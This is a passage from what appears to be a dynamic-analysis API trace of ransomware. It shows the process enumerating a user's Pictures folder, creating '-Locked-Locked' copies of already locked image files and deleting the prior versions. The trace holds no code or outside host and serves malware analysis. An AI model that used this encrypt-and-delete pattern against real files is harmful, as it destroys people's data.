ftLastAccessTime.dwLowDateTime=0x3598d596, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3598d596, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="tQi0H8EC.jpg-Locked", cAlternateFileName="TQI0H8~1.JPG")) returned 1 [0306.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359a6ea3, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359a6ea3, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359a6ea3, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="u6iPBC1t5.gif-Locked", cAlternateFileName="U6IPBC~2.GIF")) returned 1 [0306.003] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359d2eb7, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359d2eb7, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359d2eb7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uy1att05vGLsri.png-Locked", cAlternateFileName="UY1ATT~2.PNG")) returned 1 [0306.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa04425a0, ftCreationTime.dwHighDateTime=0x1d7dd03, ftLastAccessTime.dwLowDateTime=0x2963dc60, ftLastAccessTime.dwHighDateTime=0x1d7e1cb, ftLastWriteTime.dwLowDateTime=0x2963dc60, ftLastWriteTime.dwHighDateTime=0x1d7e1cb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="vtWu-", cAlternateFileName="")) returned 1 [0306.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x359f16f9, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x359f16f9, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x359f16f9, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VVbwcj.jpg-Locked", cAlternateFileName="VVBWCJ~1.JPG")) returned 1 [0306.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a4e333, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35a4e333, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35a4e333, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="X0o USyk.gif-Locked", cAlternateFileName="X0OUSY~2.GIF")) returned 1 [0306.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35a72c7c, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35a72c7c, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35a72c7c, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="xDBEu.png-Locked", cAlternateFileName="XDBEU~1.PNG")) returned 1 [0306.004] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ab721f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35ab721f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ab721f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YSfbkFfVqb.jpg-Locked", cAlternateFileName="YSFBKF~2.JPG")) returned 1 [0306.005] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x35ab721f, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x35ab721f, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35ab721f, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="YSfbkFfVqb.jpg-Locked", cAlternateFileName="YSFBKF~2.JPG")) returned 0 [0306.005] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0306.005] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af190) returned 1 [0306.006] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af19c) returned 1 [0306.006] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked-Locked", lpFilePart=0x0) returned 0x43 [0306.006] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.006] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\-yrcasxslfeumfue0u.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.006] GetFileType (hFile=0x49c) returned 0x1 [0306.007] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.007] GetFileType (hFile=0x49c) returned 0x1 [0306.011] CloseHandle (hObject=0x49c) returned 1 [0306.014] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked", lpFilePart=0x0) returned 0x3c [0306.014] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\-yrCaSxSlfeUmFUe0U.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\-yrcasxslfeumfue0u.bmp-locked")) returned 1 [0306.015] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked-Locked", lpFilePart=0x0) returned 0x45 [0306.015] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.015] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0vxzeqdcrdwwvteowajx.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.016] GetFileType (hFile=0x49c) returned 0x1 [0306.016] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.016] GetFileType (hFile=0x49c) returned 0x1 [0306.018] CloseHandle (hObject=0x49c) returned 1 [0306.018] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked", lpFilePart=0x0) returned 0x3e [0306.019] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\0VXzeqDCRdwWVtEOwAjX.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\0vxzeqdcrdwwvteowajx.bmp-locked")) returned 1 [0306.019] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked-Locked", lpFilePart=0x0) returned 0x37 [0306.020] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.020] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1a-5t7.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.020] GetFileType (hFile=0x49c) returned 0x1 [0306.020] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.021] GetFileType (hFile=0x49c) returned 0x1 [0306.034] CloseHandle (hObject=0x49c) returned 1 [0306.035] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked", lpFilePart=0x0) returned 0x30 [0306.035] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1a-5T7.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1a-5t7.png-locked")) returned 1 [0306.036] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked-Locked", lpFilePart=0x0) returned 0x42 [0306.036] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.036] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1rehjaucqfs c9jbp.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.037] GetFileType (hFile=0x49c) returned 0x1 [0306.037] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.037] GetFileType (hFile=0x49c) returned 0x1 [0306.039] CloseHandle (hObject=0x49c) returned 1 [0306.039] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked", lpFilePart=0x0) returned 0x3b [0306.039] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\1rEhjaUCQFs c9JBp.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\1rehjaucqfs c9jbp.jpg-locked")) returned 1 [0306.040] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked-Locked", lpFilePart=0x0) returned 0x44 [0306.040] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.040] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3cpzt7pcztidxfhrdlk.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.041] GetFileType (hFile=0x49c) returned 0x1 [0306.041] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.041] GetFileType (hFile=0x49c) returned 0x1 [0306.043] CloseHandle (hObject=0x49c) returned 1 [0306.043] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked", lpFilePart=0x0) returned 0x3d [0306.043] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\3Cpzt7PCzTidXfHRDLk.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\3cpzt7pcztidxfhrdlk.png-locked")) returned 1 [0306.044] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked-Locked", lpFilePart=0x0) returned 0x3f [0306.044] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.045] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7krbdwyoztkahw.gif-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.057] GetFileType (hFile=0x49c) returned 0x1 [0306.057] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.057] GetFileType (hFile=0x49c) returned 0x1 [0306.059] CloseHandle (hObject=0x49c) returned 1 [0306.060] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked", lpFilePart=0x0) returned 0x38 [0306.060] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\7krBdWYoZTKAhW.gif-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\7krbdwyoztkahw.gif-locked")) returned 1 [0306.061] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked-Locked", lpFilePart=0x0) returned 0x41 [0306.061] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.061] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\cwtm6spompjdnhyi.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.062] GetFileType (hFile=0x49c) returned 0x1 [0306.062] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.062] GetFileType (hFile=0x49c) returned 0x1 [0306.063] CloseHandle (hObject=0x49c) returned 1 [0306.064] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked", lpFilePart=0x0) returned 0x3a [0306.064] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\cWtM6sPompJDNhYi.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\cwtm6spompjdnhyi.bmp-locked")) returned 1 [0306.065] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked-Locked", lpFilePart=0x0) returned 0x38 [0306.065] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.065] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.065] GetFileType (hFile=0x49c) returned 0x1 [0306.065] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.065] GetFileType (hFile=0x49c) returned 0x1 [0306.067] CloseHandle (hObject=0x49c) returned 1 [0306.068] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked", lpFilePart=0x0) returned 0x31 [0306.068] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\desktop.ini-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\desktop.ini-locked")) returned 1 [0306.068] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked-Locked", lpFilePart=0x0) returned 0x45 [0306.068] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.069] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f-bdv5sdu0bq6drlimk5.bmp-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.069] GetFileType (hFile=0x49c) returned 0x1 [0306.069] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.069] GetFileType (hFile=0x49c) returned 0x1 [0306.835] CloseHandle (hObject=0x49c) returned 1 [0306.841] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked", lpFilePart=0x0) returned 0x3e [0306.842] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\f-BdV5SdU0Bq6dRLimk5.bmp-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\f-bdv5sdu0bq6drlimk5.bmp-locked")) returned 1 [0306.844] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked-Locked", lpFilePart=0x0) returned 0x3a [0306.844] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.844] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jbjtdopdc.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.845] GetFileType (hFile=0x49c) returned 0x1 [0306.846] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.846] GetFileType (hFile=0x49c) returned 0x1 [0306.849] CloseHandle (hObject=0x49c) returned 1 [0306.849] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked", lpFilePart=0x0) returned 0x33 [0306.849] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\JBjtDOPdC.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\jbjtdopdc.jpg-locked")) returned 1 [0306.850] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked-Locked", lpFilePart=0x0) returned 0x40 [0306.850] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.850] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ju9w4n8r3nhzr1k.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.851] GetFileType (hFile=0x49c) returned 0x1 [0306.851] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.851] GetFileType (hFile=0x49c) returned 0x1 [0306.854] CloseHandle (hObject=0x49c) returned 1 [0306.854] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked", lpFilePart=0x0) returned 0x39 [0306.854] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\Ju9W4N8R3NHzR1k.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ju9w4n8r3nhzr1k.png-locked")) returned 1 [0306.855] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked-Locked", lpFilePart=0x0) returned 0x43 [0306.855] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.855] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\onjt5so8gb0htr9slu.jpg-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.856] GetFileType (hFile=0x49c) returned 0x1 [0306.856] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.856] GetFileType (hFile=0x49c) returned 0x1 [0306.858] CloseHandle (hObject=0x49c) returned 1 [0306.858] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked", lpFilePart=0x0) returned 0x3c [0306.858] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ONjt5so8gB0htr9SLu.jpg-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\onjt5so8gb0htr9slu.jpg-locked")) returned 1 [0306.859] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked-Locked", lpFilePart=0x0) returned 0x3e [0306.859] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1af07c) returned 1 [0306.859] CreateFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ovrzpwsz9oix2.png-locked-locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x49c [0306.860] GetFileType (hFile=0x49c) returned 0x1 [0306.860] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1af078) returned 1 [0306.860] GetFileType (hFile=0x49c) returned 0x1 [0306.863] CloseHandle (hObject=0x49c) returned 1 [0306.864] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked", nBufferLength=0x105, lpBuffer=0x1aed08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked", lpFilePart=0x0) returned 0x37 [0306.864] DeleteFileW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\ovrZpwsZ9oIx2.png-Locked" (normalized: "c:\\users\\rdhj0cnfevzx\\pictures\\ovrzpwsz9oix2.png-locked")) returned 1 [0306.865] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked-Locked", nBufferLength=0x105, lpBuffer=0x1aeb88, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Pictures\\QNrRte.png-Locked-Locked", lpFilePart=0x0) returned 0x37 [0306.865] 